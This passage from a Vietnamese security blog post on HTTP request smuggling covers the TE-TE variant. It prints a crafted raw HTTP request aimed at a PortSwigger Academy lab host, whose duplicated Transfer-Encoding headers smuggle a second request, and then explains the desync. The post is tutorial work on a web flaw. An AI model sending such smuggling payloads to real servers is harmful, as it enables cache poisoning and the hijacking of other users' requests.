<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/1.1\r\n</span><br><span class="line">Host: ac4b1fcb1f596028803b11a2007400e4.web-security-academy.net\r\n</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0\r\n</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n</span><br><span class="line">Accept-Language: en-US,en;q=0.5\r\n</span><br><span class="line">Cookie: session=Mew4QW7BRxkhk0p1Thny2GiXiZwZdMd8\r\n</span><br><span class="line">Content-length: 4\r\n</span><br><span class="line">Transfer-Encoding: chunked\r\n</span><br><span class="line">Transfer-encoding: cow\r\n</span><br><span class="line">\r\n</span><br><span class="line">5c\r\n</span><br><span class="line">GPOST / HTTP/1.1\r\n</span><br><span class="line">Content-Type: application/x-www-form-urlencoded\r\n</span><br><span class="line">Content-Length: 15\r\n</span><br><span class="line">\r\n</span><br><span class="line">x=1\r\n</span><br><span class="line">0\r\n</span><br><span class="line">\r\n</span><br></pre></td></tr></table></figure>

<p>Máy chủ Proxy nhận <code>Transfer-Encoding: chunked\r\n</code>, thấy yêu cầu hợp lệ nó gửi đến máy chủ back-end.<br>Máy chủ back-end: Lúc này do tồn tại hai trường <code>Transfer-Encoding: chunked\r\n</code> và <code>Transfer-encoding: cow\r\n</code> nên khiến máy chủ bị rối, nó không biết nhận cái nào nên có thể bây giờ nó sẽ nhận <code>Content-length: 4\r\n</code>. <code>5c\r\n = 4bytes</code> nên phần sau được xem như là một yêu cầu khác, và do máy chủ tồn tại pipelining nên nó được coi như là một yêu cầu khác biệt. Lúc này một lỗi <code>Unrecognized method aPOST</code> sẽ được trả về.</p>
<h2 id="Web-cache-poisoning-thong-qua-HRS"><a href="#Web-cache-poisoning-thong-qua-HRS" class="headerlink" title="Web cache poisoning thông qua HRS:"></a>Web cache poisoning thông qua HRS:</h2><p>Tham khảo:</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://brightsec.com/blog/http-request-smuggling-hrs/#how-hrs-works">https://brightsec.com/blog/http-request-smuggling-hrs/#how-hrs-works</a></li>
<li><a target="_blank" rel="noopener" href="https://paper.seebug.org/1048/">https://paper.seebug.org/1048/</a></li>
<li><a target="_blank" rel="noopener" href="https://crashtest-security.com/http-request-smuggling/">https://crashtest-security.com/http-request-smuggling/</a></li>
</ul>
</div>
        </div>
        
        <footer class="kratos-entry-footer clearfix">
            
                <div class="post-like-donate text-center clearfix" id="post-like-donate">
                
                
                    <a class="share" href="javascript:;"><i class="fa fa-share-alt"></i> Chia sẻ</a>
                    <div class="share-wrap" style="display: none;">
    <div class="share-group">
        <a href="javascript:;" class="share-plain qq" onclick="share('qq');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-qq"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain qzone" onclick="share('qzone');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-star"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weixin pop style-plain" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weixin"></i>
            </div>
            <div class="share-int">
                <div class="qrcode" id="wechat-qr"></div>
                <p>打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮</p>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weibo" onclick="share('weibo');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weibo"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain facebook style-plain" onclick="share('facebook');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-facebook"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain twitter style-plain" onclick="share('twitter');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-twitter"></i>
            </div>
        </a>
    </div>
    <script type="text/javascript">
        $(()=>{
            new QRCode("wechat-qr", {
                text: "https://rayinaw.github.io/2022/11/30/http-request-smuggling-HTTP-1.1/",
                width: 150,
                height: 150,
                correctLevel : QRCode.CorrectLevel.H
            });
        });
        function share(dest) {
            const qqBase        = "https://connect.qq.com/widget/shareqq/index.html?";
            const weiboBase     = "https://service.weibo.com/share/share.php?";
            const qzoneBase     = "https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?";
            const facebookBase  = "https://www.facebook.com/sharer/sharer.php?";
            const twitterBase   = "https://twitter.com/intent/tweet?";
            const hostUrl       = "https://rayinaw.github.io/2022/11/30/http-request-smuggling-HTTP-1.1/";
            const title         = "「Khái niệm cơ bản về HTTP request smuggling với HTTP/1.1」";
            const excerpt       = `Lời nói đầu:Bài viết này là về khái niệm và cách HRS xảy ra đối với HTTP&#x2F;1.1, với HTTP&#x2F;2.0 và thực hành các...`;
            let _URL;
            switch (dest) {
                case "qq"       : _URL = qqBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";     break;
                case "weibo"    : _URL = weiboBase+"url="+hostUrl+"&title="+title+excerpt;                                 break;
                case "qzone"    : _URL = qzoneBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";  break;
                case "facebook" : _URL = facebookBase+"u="+hostUrl;                                                        break;
                case "twitter"  : _URL = twitterBase+"text="+title+excerpt+"&url="+hostUrl;                                break;
            }
            window.open(_URL);
        };
    </script>
</div>
                
                </div>
            
            <div class="footer-tag clearfix">
                <div class="pull-left">
                <i class="fa fa-tags"></i>
                    <a class="tag-none-link" href="/tags/HRS/" rel="tag">HRS</a>
                </div>
                <div class="pull-date">
                    <time datetime="2022-12-02T18:34:47.547Z" itemprop="dateModified">Lần chỉnh sửa cuối cùng：2022-12-03</time>
                </div>
            </div>
        </footer>
    </div>
    
        <nav class="navigation post-navigation clearfix" role="navigation">
            
            <div class="nav-previous clearfix">
                <a title=" Tính năng mới của Mysql 8" href="/2022/11/27/sqli-mysql8/">&lt; Bài đăng cũ hơn</a>
            </div>
            
            
            <div class="nav-next clearfix">
                <a title=" Một bản ghi chép nhỏ về Docker" href="/2022/12/03/docker-learning/">Bài đăng mới hơn &gt;</a>
            </div>
            
        </nav>
    
    
</article>

        

            </section>

        

                
            

<section id="kratos-widget-area" class="col-md-4 hidden-xs hidden-sm">
    <!-- 文章和页面根据splitter来分割，没有的话就从头开始设置为sticky -->
    
    
                <aside id="krw-about" class="widget widget-kratos-about clearfix">
    <div class="photo-background"></div>
    <div class="photo-wrapper clearfix">
        <div class="photo-wrapper-tip text-center">
            <img class="about-photo" src="/images/avatar.webp" loading="lazy" decoding="auto" />
        </div>
    </div>
    <div class="textwidget">
        <p class="text-center">来年の事を言えば鬼が笑う</p>
    </div>
    <div class="site-meta">
        <a class="meta-item" href="/archives/">
            <span class="title">
                Bài đăng
            </span>
            <span class="count">
                6
            </span>
        </a>
        <a class="meta-item" href="/categories/">
            <span class="title">
                Thể loại
            </span>
            <span class="count">
                8
            </span>
        </a>
        <a class="meta-item" href="/tags/">
            <span class="title">
                Thẻ
            </span>
            <span class="count">
                9
            </span>
        </a>
    </div>
</aside>
            
                    <div class="sticky-area">
                
                    <aside id="krw-toc" class="widget widget-kratos-toc clearfix toc-div-class" >
    <div class="photo-background"></div>
    <h4 class="widget-title no-after">
        <i class="fa fa-compass"></i>
        Thư mục bài viết
        <span class="toc-progress-bar" role="progressbar" aria-label="阅读进度："></span>
    </h4>
    <div class="textwidget">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Loi-noi-dau"><span class="toc-text">Lời nói đầu:</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Mot-vai-kien-thuc-can-nam"><span class="toc-text">Một vài kiến thức cần nắm:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Keep-Alive-va-Pipelining"><span class="toc-text">Keep-Alive và Pipelining:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Content-Length-va-Transfer-Encoding"><span class="toc-text">Content-Length và Transfer-Encoding:</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Content-Length"><span class="toc-text">Content-Length:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Transfer-Encoding"><span class="toc-text">Transfer-Encoding:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Reverse-proxy"><span class="toc-text">Reverse proxy:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Khai-niem-web-cache"><span class="toc-text">Khái niệm web cache:</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Co-mot-so-loai-web-cache-nhu-sau"><span class="toc-text">Có một số loại web cache như sau:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Yeu-cau-cua-loi-HRS"><span class="toc-text">Yêu cầu của lỗi HRS:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HTTP-request-smuggling-o-HTTP-x2F-1-1"><span class="toc-text">HTTP request smuggling ở HTTP&#x2F;1.1</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#CL-Content-Length-khong-bang-0"><span class="toc-text">CL(Content-Length) không bằng 0:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CL-CL"><span class="toc-text">CL-CL:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CL-TE"><span class="toc-text">CL-TE</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TE-CL"><span class="toc-text">TE-CL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TE-TE"><span class="toc-text">TE-TE</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web-cache-poisoning-thong-qua-HRS"><span class="toc-text">Web cache poisoning thông qua HRS:</span></a></li></ol></li></ol>
    </div>
</aside>
                
                
  <aside id="krw-categories" class="widget widget-kratos-categories clearfix">
    <h4 class="widget-title"><i class="fa fa-folder"></i>Thể loại</h4>
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/DevOps/">DevOps</a><span class="category-list-count">1</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/DevOps/Docker/">Docker</a><span class="category-list-count">1</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/HTTP-Request-Smuggling/">HTTP Request Smuggling</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Java/">Java</a><span class="category-list-count">3</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/Java/Deserialization/">Deserialization</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Java/Programming/">Programming</a><span class="category-list-count">1</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/Mysql/">Mysql</a><span class="category-list-count">1</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/Mysql/SQLi/">SQLi</a><span class="category-list-count">1</span></li></ul></li></ul>
  </aside>


            
                
  <aside id="krw-tags" class="widget widget-kratos-tags clearfix">
    <h4 class="widget-title"><i class="fa fa-tags"></i>Những thẻ hiện có</h4>
      <div class="tag-clouds">
        <a href="/tags/Commons-Collections/" style="font-size: 0.6em;">Commons Collections</a> <a href="/tags/Deserialization/" style="font-size: 0.7em;">Deserialization</a> <a href="/tags/Docker/" style="font-size: 0.6em;">Docker</a> <a href="/tags/HRS/" style="font-size: 0.6em;">HRS</a> <a href="/tags/Java/" style="font-size: 0.8em;">Java</a> <a href="/tags/Mysql/" style="font-size: 0.6em;">Mysql</a> <a href="/tags/Programming/" style="font-size: 0.6em;">Programming</a> <a href="/tags/Reflection/" style="font-size: 0.6em;">Reflection</a> <a href="/tags/SQLi/" style="font-size: 0.6em;">SQLi</a>
      </div>
  </aside>

            
                
  <aside id="krw-posts" class="widget widget-kratos-posts">
  <h4 class="widget-title"><i class="fa fa-file"></i>Bài viết gần đây</h4>
  <div class="tab-content">
      <ul class="list-group">
        
        
          
          
            <a class="list-group-item" href="/2022/12/03/docker-learning/"><i class="fa  fa-book"></i> Một bản ghi chép nhỏ về Docker</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/11/30/http-request-smuggling-HTTP-1.1/"><i class="fa  fa-book"></i> Khái niệm cơ bản về HTTP request smuggling với HTTP/1.1</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/11/27/sqli-mysql8/"><i class="fa  fa-book"></i> Tính năng mới của Mysql 8</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/11/04/Commons-Collections1-TransformedMap/"><i class="fa  fa-book"></i> Phân tích chuỗi Commons Collections 1 với TransformedMap</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/11/03/JavaDeserializationBasic/"><i class="fa  fa-book"></i> Introduction to Java Deserialization</a>
            
          
        
          
            
      </ul>
  </div>
  </aside>

            
    </div>
</section>
        
        </div>
    </div>
</div>
<footer>
    <div id="footer"  class="ap-lrc"  >
        <div class="container">
            <div class="row">
                <div class="col-md-6 col-md-offset-3 footer-list text-center">
                    <ul class="kratos-social-icons">
                        
                        <li><a href="mailto:rayin.awarf@gmail.com"><i class="fa fa-envelope"></i></a></li>
                        <li><a target="_blank" rel="nofollow" href="https://t.me/rayinaw"><i class="fa fa-telegram"></i></a></li>
                        
                        
                        
                        
                        <li><a target="_blank" rel="nofollow" href="https://github.com/rayinaw"><i class="fa fa-github"></i></a></li>
                        
                    </ul>
                    <ul class="kratos-copyright">
                        <div>
                            <li>&copy; 2022 Rayinaw All rights reserved.</li>
                            <li>This site has been running for<span id="span_dt">Loading...</span></li>
                        </div>
                        <div>
                            <li>Theme <a href="https://github.com/Candinya/Kratos-Rebirth" target="_blank">Kratos:Rebirth</a></li>
                            <li>Site built with&nbsp;<i class="fa fa-heart throb" style="color:#d43f57"></i>&nbsp;by Rayinaw.</li>
                        </div>
                        <div>
                            <li>Powered by <a href="https://hexo.io" target="_blank" rel="nofollow">Hexo</a></li>
                            <li>Hosted on <a href="https://github.io" target="_blank">Github Pages</a></li>
                        </div>
                        <div>
                            
                            
                        </div>
                    </ul>
                </div>
            </div>
        </div>
        <div class="kr-tool text-center">
            <div class="tool">
                
                    <div class="box search-box">
                        <a href="/search/">
                            <span class="fa fa-search"></span>
                        </a>
                    </div>
                
                
                    <div class="box theme-box" id="darkmode-switch">
                        <span class="fa fa-adjust"></span>
                    </div>
                
                
            </div>
            <div class="box gotop-box">
                <span class="fa fa-chevron-up"></span>
            </div>
        </div>
    </div>
</footer>
</div>
</div>

        <script defer src="/vendors/bootstrap@3.3.4/dist/js/bootstrap.min.js"></script>
<script defer src="/vendors/nprogress@0.2.0/nprogress.js"></script>
<script>
    if (!window.kr) {
        window.kr = {};
    }
    window.kr.notMobile = (!(navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)));
    window.kr.siteRoot = "/";
</script>

    <div>
        <canvas id="snow"></canvas>
        <script async src="/js/snow.min.js"></script>
    </div>


    <script async src="/js/candy.min.js"></script>



    <script defer src="/vendors/aplayer@1.10.1/dist/APlayer.min.js"></script>
    
    <script defer src="/vendors/meting@2.0.1/dist/Meting.min.js"></script>
    <meting-js
        server="netease"
        type="playlist"
        id="3204190542"
        order="random"
        fixed="true"
    >
    </meting-js>



    <script defer src="/vendors/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>

<script defer src="/vendors/clipboard@2.0.6/dist/clipboard.min.js"></script>
<script defer src="/js/kratosr.min.js"></script>
<script defer src="/js/pjax.min.js"></script>



<!-- Extra support for third-party plguins  -->


    </body>
</html>